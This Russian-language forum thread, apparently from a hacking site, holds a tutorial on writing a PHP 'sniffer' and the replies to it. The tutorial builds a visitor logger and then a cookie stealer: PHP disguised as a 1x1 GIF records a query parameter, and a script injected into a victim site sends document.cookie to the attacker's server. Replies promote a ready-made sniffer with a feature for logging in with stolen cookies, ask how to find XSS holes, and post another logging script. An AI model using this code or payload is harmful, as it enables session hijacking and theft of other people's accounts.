Авторские статьи Пишем свой Php сниффер

Многие, скорее всего, пользовались ачатовским сниффером. Многие знали как он работает, многие даже не догадывались. Вот для вторых и предназначена эта статья. В этой статье гуру ачата и профи программеры ничего нового для себя не найдут.
Итак, начнём. Для начала теория. Что такое сниффер?
Цитата из википедии

Мы будем писать скрипт, который позволяет получать какие-то сведения о тех, кто заходит к вам на страницу.
Какие сведения можно получать сниффером? Да почти любые, начиная от IP адреса жертвы, заканчивая coockies.
Зачем это надо? Если у вас возник такой вопрос, то эта статья, скорее всего, вам не пригодиться. Итак, поехали...
Что нам надо для создания собственного сниффера?

• мозг и ровные руки
• хостинг с поддержкой PHP

Для начала повторюсь. Задачей нашего сниффера будет сбор информации о жертве, зашедшей на наш сайт и сохранение этой информации в файле.
Создаём 2 файла - sniff.php и log.txt
Заполняем файл sniff.php. Для понимая того, что мы делаем, мы будем сейчас работать со стандартными переменнымы.

Переменная file будет хранить название и путь к файлу log.txt, нашему файлу с результатами:
$file=”log.txt”;
Теперь объявим переменные, в которых будет хранится информация о дате и времени посещения страницы.

PHP:

$data=date("D.M.Y"); //в скобках прописан формат отображения даты D - день недели, M - месяц Y - год.
$time=date("h:i"); //в скобках прописан формат отображения времени h - часы, i - минуты


Теперь нам нужно собрать инфрмацию о посетителе. Что может лучше описать посетителя, чем его IP адресс и информация о системе?

PHP:

$ip=trim($_SERVER['REMOTE_ADDR']);  
$sysinfo=trim($_SERVER['HTTP_USER_AGENT']);
// это стандартные переменные, которые автоматом принимает сервер


Теперь пишем основной код

PHP:

if(is_file($file)){ //Проверяем наличие файла и возможность работы с ним
$fo=fopen($file,"a"); //Открываем файл на запись в конец
$res="$data | $time | $ip | $sysinfo \n"; //Формируем строку с информацией от жертвы
//в формате дата|время|ip-адрес|характеристика системы
//переход на следующую строку n
$fw=fwrite($fo,$res); //Записываем в файл
fclose($fo); //Закрываем файл
}


Сниффер готов. Заливаем его на любой хост с PHP и проверяем его работу. Заходим на страницу sniff.php и видим белый экран без ошибок - значит всё сделали правильно. Теперь смотрим содержимое файла log.txt. Оно должно быть примерно следующего содержания:

Что теперь с ним делать? Да ничего почти. Для серьёзных вещей он не подходит. Для серьёзных и интересных вещей нам нужно уметь пользоваться куками. Что такое cookies?

Так что всё в ваших руках... Юзаем свой мозг и гугль, совершенствуемся...

Для тех, кому лень это делать продолжаю статью.
Для того, чтобы украсть чужие куки нам нелбходимо:

• всё, что нужно было для создания простого сниффера

Для начала создадим картинку, размером 1х1 пиксель(для примера). Далее, в файл sniff.php добавляем переменную

PHP:

$query=trim($HTTP_GET_VARS['cook']);

Не забываем добавить эту переменную на запись в файл

PHP:

$res="$data | $time | $ip | $sysinfo \n $query \n"; //Формируем строку с информацией от жертвы

Так же отображаем нашу 1х1 картинку:

PHP:

Header("Content-type: image/png");
$im = ImageCreateFromGif("путь_к_вашей_картинке");
ImageGif($im);
ImageDestroy($im);


Переименовываем наш sniff.php в sniff.gif и создаём на серваке файл .htaccess со следующем текстом:

Теперь пишем скрипт, который будет находиться на сайте жертвы, и передавать нам с него все куки:

HTML:

<script>img = new Image(); img.src = "http://путь_к_вашему_снифферу/sniff.gif?cook='+document.cookie;</script>

В этом скрипте мы получаем куки и отправляем их нашему скрипту в переменной cook.
Проверяем работу скрипта. Писал без кофе и пива, так что мог что-то забыть. Почитаю коментарии и доделаю статью с утра. Всем спасибо.

 

а модераторы сего раздела в отпуске или "пишут свой сниффер?".
---Модераторы смотрят отзывы. И твой в том числе. Что то я конструктивной критики лично в твоем посте не наблюдаю. Посмотрим что еще скажут люди.
Alexsize
+ 5 Alexsize
-=lebed=-

 

Хочешь сказать у тебя есть описание как они работают? По программной части может и есть, а вот как происходит передача кук из твоего поста я например непонял... Он перехватывает куки, как?! Нет объяснения, что при загрузке скрипта браузером с нашего сервера где сниффер, грузится картинка с параметрами кукисов, которые получаются из функции жаваскрипта document.cookie и т.д. и т.п. и поехали дальше...

 

омг, очередной пятиколёсный велосипед =\

сниф каника рулит, как ни крути!!! - http://kanick.ru/sniffer/

описалово:
Вот краткий обзор функционала сниффера:

* красивый, интуитивно понятный интерфейс, в котором всё учтено
* поддержка всех известных браузеров
* система фильтров, позволяющая отбирать из лога только нужные записи
* фильтрация запросов (еще до попадения в лог)
* функция “Волшебная палочка”, позволяющая быстро заходить на сайт с украденными cookies
* удаление отмеченных записей
* помечание новых записей
* возможность авторизованного доступа
* отправка оповещений на e-mail, ICQ — new!
* поддержка различных стилей оформления (4 стиля в комплекте)
* совместимость с предыдущими версиями (достаточно перенести файл data.txt)
* экспорт (сохранение) данных — new!
* подробный FAQ

…и многое другое.

+ http://old.antichat.ru/sniff/

ещё можно почитать:
http://old.antichat.ru/txt/old/cookie.shtml
http://old.antichat.ru/crackchat/HTML/
и
http://old.antichat.ru/txt/utf7/

 

Не ф тему просто так получилось)Щас поднимаю веб сервак и скачиваю все нужные мне дистрибитивы.Так вот к чему пишу то ,все уже в курсе что четвертая ветка умерает в конце этого года и официально поддерживаться больше не будет))

 

Почему?

Делал всё как ты писал! - Чё-то вообще ничего не работает..
Скачал "php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ" - Всё в норме... Не могу разобраться почему?

 

как отдельной статьи нет... Но в других темах дохуя мануалов по написанию сниффера...

 

Как...

http://video.antichat.ru/file232.html
"Я нашол в течене 30 минут"
А как искать xss? Та, которая на видео больше не пашет...

 

лол чувак этих статей по нету целая куча можно просто взять какой нить готовый снифер и вписать туда немногго своих функции и сделать интерфейс покасивее

 

да и еще одно ты быхоть когда статью писал изменил бы немногоскрипт
$res="$data | $time | $ip | $sysinfo \n $query \n"; // а то вот это уж больно знакомое
копираиты лучше дай

 

heks, такую строку нереально написать самому? =\

 

почему реально просто вт такой же последовательности думаю это уже что то не то
а статью про снифер это просто глупо можно как я уже писал выше скачать готовый а изобретать велосипед не надо !!

 

Оффтопs

Свой вариант снифера:

PHP:

<?
Error_Reporting(E_ALL & ~E_NOTICE);
$dt=date('Y-m-d [H:i:s]');
$fp=fopen('log.txt', a) ;
$log = $_SERVER['REMOTE_ADDR']."". $data. "<br>Дата :: "."". $dt."<br>Софт :: ". getenv("HTTP_USER_AGENT").".<p><hr></p>";
fwrite($fp, $log); 
?>

Скрипт сам создаёт файл лога или вписывает в существующий. Далие инклудится в log.php и просматриваем лог как удобный html документ в виде списка).

Уже год сидит и трудится на холме.ру

просто для разницы результата, без подвохов:

2heks, "велосипеды" бывают разных видов...)

 

2 XHTTP:
У меня твой сниффер всё время один и тот же ip даёт: 127.0.0.1

Тема Closed, ввиду очевидности изложенной информации по сабжу.
-=lebed=-